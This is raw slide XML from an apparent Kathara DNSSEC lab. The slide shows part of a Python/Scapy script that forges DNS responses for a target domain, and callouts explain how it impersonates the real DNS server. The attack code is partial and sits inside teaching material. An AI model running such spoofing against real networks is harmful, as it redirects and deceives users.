                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ether_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].sport)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E061DB8-734C-E89C-6DAA-7492DD607A78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/r2/r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88794D37-BF02-CFBE-02FA-408AACA87225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D90B9B-0B5D-C960-6D84-65B253F22766}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D102C6C5-98F2-23F0-A3BE-630F4CF88B1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C5579B-BD6B-7558-0B2B-422C343B81B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="150173" y="1909973"/>
            <a:ext cx="5134346" cy="1007972"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9635"/>
              <a:gd name="adj2" fmla="val 217217"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creates Ethernet header, Reverses MAC addresses: the destination of the fake packet will be the source of the captured one</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EDE81B1-E184-28D9-342F-8F9291B3502D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5088330" y="5611906"/>
            <a:ext cx="5385706" cy="1007972"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75477"/>
              <a:gd name="adj2" fmla="val -99703"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create the IP header. This is where the attacker "steals" the server's identity: the source IP of the response will be the IP of the real DNS server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3453112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B67863-B02C-706C-5444-1292AE687B42}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7977412-38C2-7FE7-855D-3EAB6D6536AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
